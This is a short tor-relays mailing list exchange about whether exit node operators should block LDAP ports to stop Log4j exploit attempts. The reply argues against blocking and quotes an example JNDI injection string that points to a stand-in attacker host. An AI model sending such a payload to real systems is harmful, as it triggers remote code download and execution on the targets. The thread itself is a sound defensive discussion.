Re: [tor-relays] Mitigating log4j exploits

[Felix Eckhofer via tor-relays]

Hey,

Am 11.12.2021 13:51, schrieb Jens Kubieziel:

attacks. One possibility is, in my opinion, rejecting connection over
ports 389 and 636. What do you think? Should we as exit node operators
block connections over those LDAP ports for some amount of time?


don't think this is going to help.

The exploit works like this: Send a special string that *references* an 
ldap server (most used right now, though other protocols are possible), 
such as "${jndi:ldap://attacker.example.com:port/a};. The target then 
contacts the ldap server and essentially downloads the malicious code 
from there. You can include a custom port as shown and many attackers 
do. Most exploit attempts use http(s). Nothing we can block without 
packet inspection.



Best regards,
Felix
___
tor-relays mailing list
tor-relays@lists.torproject.org
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays

[tor-relays] Mitigating log4j exploits

[Jens Kubieziel]

Hiho,

we got a notice that currently several exploit attempts for the log4j 
flaw going through Tor exit nodes und using LDAP. See 
https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
The sender asked to do something against the currently running attacks. 
One possibility is, in my opinion, rejecting connection over ports 389 
and 636. What do you think? Should we as exit node operators block 
connections over those LDAP ports for some amount of time?


Best,

qbi
___
tor-relays mailing list
tor-relays@lists.torproject.org
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays